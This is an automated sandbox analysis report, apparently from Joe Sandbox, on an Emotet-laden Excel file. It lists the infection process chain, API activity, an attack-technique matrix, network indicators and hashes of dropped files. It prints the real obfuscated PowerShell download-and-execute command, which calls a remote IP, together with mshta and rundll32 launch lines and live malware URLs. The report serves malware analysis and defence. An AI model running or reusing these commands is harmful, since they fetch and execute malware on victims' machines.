                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344087 mov eax, dword ptr fs:[00000030h] 9_2_00344087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4087 mov eax, dword ptr fs:[00000030h] 10_2_001D4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00364087 mov eax, dword ptr fs:[00000030h] 11_2_00364087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C4087 mov eax, dword ptr fs:[00000030h] 13_2_003C4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00204087 mov eax, dword ptr fs:[00000030h] 14_2_00204087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                            Source: Yara match File source: imedpub_6.xls, type: SAMPLE
                            Source: Yara match File source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
                            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                            Valid Accounts21
                            Scripting
                            1
                            Windows Service
                            1
                            Windows Service
                            1
                            Disable or Modify Tools
                            1
                            Input Capture
                            2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer
                            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API
                            Boot or Logon Initialization Scripts111
                            Process Injection
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory3
                            File and Directory Discovery
                            Remote Desktop Protocol1
                            Email Collection
                            Exfiltration Over Bluetooth1
                            Encrypted Channel
                            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution
                            Logon Script (Windows)Logon Script (Windows)21
                            Scripting
                            Security Account Manager38
                            System Information Discovery
                            SMB/Windows Admin Shares1
                            Input Capture
                            Automated Exfiltration2
                            Non-Application Layer Protocol
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter
                            Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information
                            NTDS21
                            Security Software Discovery
                            Distributed Component Object Model1
                            Clipboard Data
                            Scheduled Transfer122
                            Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution
                            Network Logon ScriptNetwork Logon Script2
                            Masquerading
                            LSA Secrets1
                            Virtualization/Sandbox Evasion
                            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell
                            Rc.commonRc.common1
                            Virtualization/Sandbox Evasion
                            Cached Domain Credentials1
                            Process Discovery
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                            Process Injection
                            DCSync1
                            Application Window Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories
                            Proc Filesystem1
                            Remote System Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32
                            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Behavior Graph (ID: 562403, Sample: imedpub_6.xls, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100)
Process chain: EXCEL.EXE -> cmd.exe -> mshta.exe -> powershell.exe -> cmd.exe -> rundll32.exe -> rundll32.exe -> rundll32.exe -> rundll32.exe -> rundll32.exe
Dropped files: C:\Users\user\Desktop\imedpub_6.xls (Composite, by EXCEL.EXE); C:\ProgramData\JooSee.dll (PE32, by powershell.exe); C:\Windows\...\xjvfkwqtmalp.bjg (copy) (PE32, by rundll32.exe)
Network: mshta.exe contacted 91.240.118.172; powershell.exe contacted hostfeeling.com (164.90.147.135) and jurnalpjf.lan.go.id (103.206.244.105)

Source | Detection | Scanner | Label | Link
imedpub_6.xls | 19% | ReversingLabs | Document-Excel.Trojan.Emotet |

Source | Detection | Scanner | Label | Link
C:\ProgramData\JooSee.dll | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
hostfeeling.com | 11% | Virustotal | | Browse
jurnalpjf.lan.go.id | 1% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
hostfeeling.com | 164.90.147.135 | true | true | | unknown
jurnalpjf.lan.go.id | 103.206.244.105 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://91.240.118.172/gg/ff/fe.png | true | Avira URL Cloud: malware | unknown
http://jurnalpjf.lan.go.id/assets/iM/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.172/gg/ff/fe.html | true | Avira URL Cloud: malware | unknown
                              • Avira URL Cloud: malware
                              unknown
                              http://activetraining.sytes.net/libraries/8s/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.ppowershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://gardeningfilm.com/wp-contpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://jurnalpjf.lan.go.id/assets/iM/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.htmlBimedpub_6.xls.0.drtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://ja.com/powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://91.240.118.172/gg/ff/fe.htmlCmshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://secure.comodo.com/CPS0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://160.16.102.168/3rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.entrust.net/2048ca.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562403
Start date: 28.01.2022
Start time: 21:00:39
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: imedpub_6.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@21/12@2/48
EGA Information:
• Successful, ratio: 71.4%
HDC Information:
• Successful, ratio: 18.7% (good quality ratio 15.8%)
• Quality average: 65.4%
• Quality standard deviation: 33%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 56
• Number of non-executed functions: 197
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 92.123.101.210, 92.123.101.211, 92.123.101.225, 92.123.101.179
• Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target mshta.exe, PID 1996 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2576 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:01:21 | API Interceptor | 57x Sleep call for process: mshta.exe modified
21:01:25 | API Interceptor | 443x Sleep call for process: powershell.exe modified
21:02:02 | API Interceptor | 149x Sleep call for process: rundll32.exe modified
                                                                                                                  • 164.90.147.135
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
S-NET-ASPL
OnlineSASFR
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):548864
                                                                                                                  Entropy (8bit):6.980518796737633
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvNyMwWd3DYr6i64/:OUBPSczbeeTnvhZDWA
                                                                                                                  MD5:8A6FB79B56B4C5F45322AAA8150C5E36
                                                                                                                  SHA1:09453D0478D6725C5ECFBD1644CCC156811F0A6C
                                                                                                                  SHA-256:DCC5DFE8C7150DD55E2F22EEBAE19F04EFAFA214DC7E1366A0CF4CCC7E616119
                                                                                                                  SHA-512:2F06489632ADEA7B67D544B3B0491B78AEE29F3C91B38251445ABA70CAF148EF6A1ADCC4158C1B85DC9F2036F790A2AF9622DDF7F3FF85D67A19B87BC5BA7F4F
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61414
                                                                                                                  Entropy (8bit):7.995245868798237
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                  MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                  SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                  SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                  SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):328
                                                                                                                  Entropy (8bit):3.104167099933915
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:kKbKk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:u9kPlE99SNxAhUeYlUSA/t
                                                                                                                  MD5:95F4F0C11185412D12B65919895BDB4E
                                                                                                                  SHA1:10F9F4BBF444E04A5B5D106B9FD93AB5E7D811C3
                                                                                                                  SHA-256:343826616ADD89B2917DFB50478FB429999FD64CBE8052DDEC6ACE8A2F9A5B5C
                                                                                                                  SHA-512:D02D1F22B3C499EF2ACC3719F7E0B40DD09D47EB0F9F61FBCCF8AF4A1D38AB17942DED75B181A14206D914FC12D1E483CE86C5E520DE772F18D1E3B084798BE8
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                  File Type:data
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):11054
                                                                                                                  Entropy (8bit):6.200485074224619
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                                                                                                  MD5:DD20B97330028BCB6BF98D97C47028D9
                                                                                                                  SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                                                                                                  SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                                                                                                  SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                                                                                                  Malicious:false
                                                                                                                  IE Cache URL:http://91.240.118.172/gg/ff/fe.html
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1536
                                                                                                                  Entropy (8bit):1.1464700112623651
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61414
                                                                                                                  Entropy (8bit):7.995245868798237
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                  MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                  SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                  SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                  SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):3.5189161831469296
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                                                                                                  MD5:06A30014EFAE12913C829BE85DD271EC
                                                                                                                  SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                                                                                                  SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                                                                                                  SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):512
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3::
                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8016
                                                                                                                  Entropy (8bit):3.581071677225738
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:chQCcMqHkqvsqvJCwoIz8hQCcMqHkqvsEHyqvJCworezIyYHhHjUVhuWlUVqA2:ciJLoIz8iJfHnorezI99UVhuQA2
                                                                                                                  MD5:7C42011AF0DACCEB29F700C458000C2F
                                                                                                                  SHA1:089CA36ABEF9322C25CA368709E19C7B2B48EA3E
                                                                                                                  SHA-256:C629400B7EC30191EE69661C40DF47ECD0DEB2DCD8D540C27A8987CE6AC21E8B
                                                                                                                  SHA-512:6E84C13528D3371646201C99DE7ADFA7807A8FB403DBF40971AC86DB826CB150248AE0E9FA6F526E0944DC0BB68B1320B600F5A6E186E681688423300096B5E2
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8016
                                                                                                                  Entropy (8bit):3.581071677225738
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:chQCcMqHkqvsqvJCwoIz8hQCcMqHkqvsEHyqvJCworezIyYHhHjUVhuWlUVqA2:ciJLoIz8iJfHnorezI99UVhuQA2
                                                                                                                  MD5:7C42011AF0DACCEB29F700C458000C2F
                                                                                                                  SHA1:089CA36ABEF9322C25CA368709E19C7B2B48EA3E
                                                                                                                  SHA-256:C629400B7EC30191EE69661C40DF47ECD0DEB2DCD8D540C27A8987CE6AC21E8B
                                                                                                                  SHA-512:6E84C13528D3371646201C99DE7ADFA7807A8FB403DBF40971AC86DB826CB150248AE0E9FA6F526E0944DC0BB68B1320B600F5A6E186E681688423300096B5E2
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
